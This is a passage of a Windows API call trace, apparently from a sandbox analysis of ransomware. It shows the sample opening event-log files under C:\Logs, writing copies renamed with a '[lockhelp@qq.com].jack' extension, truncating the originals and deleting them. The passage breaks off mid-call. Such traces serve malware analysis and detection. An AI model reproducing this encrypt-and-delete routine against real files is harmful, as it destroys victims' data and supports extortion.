[0214.749] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".rar") returned 4 [0214.749] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".bz2") returned 4 [0214.749] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".7z") returned 3 [0214.749] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".dbf") returned 4 [0214.749] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".1cd") returned 4 [0214.750] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.750] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.750] lstrlenW (lpString=".jpg") returned 4 [0214.750] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.750] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0214.750] lstrlenW (lpString="Microsoft-Windows-Store%4Operational.evtx") returned 41 [0214.750] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.751] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0214.751] CloseHandle (hObject=0x3b8) returned 1 [0214.751] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 0x20 [0214.751] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.751] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.751] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.751] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.751] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0214.751] GetLastError () returned 0x0 [0214.751] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0214.755] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0214.756] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.756] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x126, lpOverlapped=0x0) returned 1 [0214.756] SetEndOfFile (hFile=0x438) returned 1 [0214.756] CloseHandle (hObject=0x438) returned 1 [0214.758] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.758] SetEndOfFile (hFile=0x3b8) returned 1 [0214.759] CloseHandle (hObject=0x3b8) returned 1 [0214.759] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0214.760] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 1 [0214.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.760] lstrlenW (lpString=".doc") returned 4 [0214.760] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.760] lstrlenW (lpString=".docx") returned 5 [0214.760] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.760] lstrlenW (lpString=".pdf") returned 4 [0214.760] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.760] lstrlenW (lpString=".xls") returned 4 [0214.760] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.760] lstrlenW (lpString=".xlsx") returned 5 [0214.760] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.760] lstrlenW (lpString=".ppt") returned 4 [0214.760] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString=".zip") returned 4 [0214.761] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".rar") returned 4 [0214.761] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".bz2") returned 4 [0214.761] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".7z") returned 3 [0214.761] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString=".dbf") returned 4 [0214.761] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString=".1cd") returned 4 [0214.761] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString=".jpg") returned 4 [0214.761] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.761] lstrlenW (lpString=".doc") returned 4 [0214.761] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".docx") returned 5 [0214.761] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.761] lstrlenW (lpString=".pdf") returned 4 [0214.761] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".xls") returned 4 [0214.761] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.761] lstrlenW (lpString=".xlsx") returned 5 [0214.761] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.761] lstrlenW (lpString=".ppt") returned 4 [0214.762] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.762] lstrlenW (lpString=".zip") returned 4 [0214.762] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString=".rar") returned 4 [0214.762] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString=".bz2") returned 4 [0214.762] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString=".7z") returned 3 [0214.762] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.762] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.762] lstrlenW (lpString=".dbf") returned 4 [0214.762] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.762] lstrlenW (lpString=".1cd") returned 4 [0214.762] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.762] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0214.762] lstrlenW (lpString=".jpg") returned 4 [0214.762] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.762] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0214.762] lstrlenW (lpString="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 49 [0214.762] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.763] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0214.763] CloseHandle (hObject=0x3b8) returned 1 [0214.763] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 0x20 [0214.763] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.763] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.763] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.763] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.763] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0214.766] GetLastError () returned 0x0 [0214.766] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0214.825] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0214.826] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.826] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x136, lpOverlapped=0x0) returned 1 [0214.826] SetEndOfFile (hFile=0x438) returned 1 [0214.826] CloseHandle (hObject=0x438) returned 1 [0214.829] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.829] SetEndOfFile (hFile=0x3b8) returned 1 [0214.830] CloseHandle (hObject=0x3b8) returned 1 [0214.830] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0214.830] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 1 [0214.831] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.831] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.831] lstrlenW (lpString=".doc") returned 4 [0214.831] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".docx") returned 5 [0214.831] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.831] lstrlenW (lpString=".pdf") returned 4 [0214.831] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".xls") returned 4 [0214.831] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".xlsx") returned 5 [0214.831] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.831] lstrlenW (lpString=".ppt") returned 4 [0214.831] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.831] lstrlenW (lpString=".zip") returned 4 [0214.831] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".rar") returned 4 [0214.831] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".bz2") returned 4 [0214.831] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.831] lstrlenW (lpString=".7z") returned 3 [0214.831] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.831] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.831] lstrlenW (lpString=".dbf") returned 4 [0214.831] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString=".1cd") returned 4 [0214.832] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString=".jpg") returned 4 [0214.832] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString=".doc") returned 4 [0214.832] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".docx") returned 5 [0214.832] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.832] lstrlenW (lpString=".pdf") returned 4 [0214.832] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".xls") returned 4 [0214.832] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".xlsx") returned 5 [0214.832] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.832] lstrlenW (lpString=".ppt") returned 4 [0214.832] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString=".zip") returned 4 [0214.832] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".rar") returned 4 [0214.832] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".bz2") returned 4 [0214.832] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString=".7z") returned 3 [0214.832] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.832] lstrlenW (lpString=".dbf") returned 4 [0214.832] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.833] lstrlenW (lpString=".1cd") returned 4 [0214.833] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0214.833] lstrlenW (lpString=".jpg") returned 4 [0214.833] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.833] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0214.833] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 66 [0214.833] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.833] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0214.833] CloseHandle (hObject=0x3b8) returned 1 [0214.833] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 0x20 [0214.833] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.833] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.833] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.834] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.834] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0215.091] GetLastError () returned 0x0 [0215.091] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.106] WriteFile (in: hFile=0x450, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.108] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.108] WriteFile (in: hFile=0x450, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x158, lpOverlapped=0x0) returned 1 [0215.108] SetEndOfFile (hFile=0x450) returned 1 [0215.108] CloseHandle (hObject=0x450) returned 1 [0215.110] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.110] SetEndOfFile (hFile=0x3b8) returned 1 [0215.111] CloseHandle (hObject=0x3b8) returned 1 [0215.111] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.111] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 1 [0215.112] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.112] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.112] lstrlenW (lpString=".doc") returned 4 [0215.112] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString=".docx") returned 5 [0215.112] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.112] lstrlenW (lpString=".pdf") returned 4 [0215.112] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString=".xls") returned 4 [0215.112] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString=".xlsx") returned 5 [0215.112] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.112] lstrlenW (lpString=".ppt") returned 4 [0215.112] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.112] lstrlenW (lpString=".zip") returned 4 [0215.112] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString=".rar") returned 4 [0215.112] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.112] lstrlenW (lpString=".bz2") returned 4 [0215.112] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString=".7z") returned 3 [0215.113] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString=".dbf") returned 4 [0215.113] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString=".1cd") returned 4 [0215.113] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString=".jpg") returned 4 [0215.113] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString=".doc") returned 4 [0215.113] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString=".docx") returned 5 [0215.113] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.113] lstrlenW (lpString=".pdf") returned 4 [0215.113] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString=".xls") returned 4 [0215.113] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString=".xlsx") returned 5 [0215.113] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.113] lstrlenW (lpString=".ppt") returned 4 [0215.113] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.113] lstrlenW (lpString=".zip") returned 4 [0215.113] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.113] lstrlenW (lpString=".rar") returned 4 [0215.114] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.114] lstrlenW (lpString=".bz2") returned 4 [0215.114] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.114] lstrlenW (lpString=".7z") returned 3 [0215.114] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.114] lstrlenW (lpString=".dbf") returned 4 [0215.114] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.114] lstrlenW (lpString=".1cd") returned 4 [0215.114] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0215.114] lstrlenW (lpString=".jpg") returned 4 [0215.114] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.114] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.114] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 70 [0215.114] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 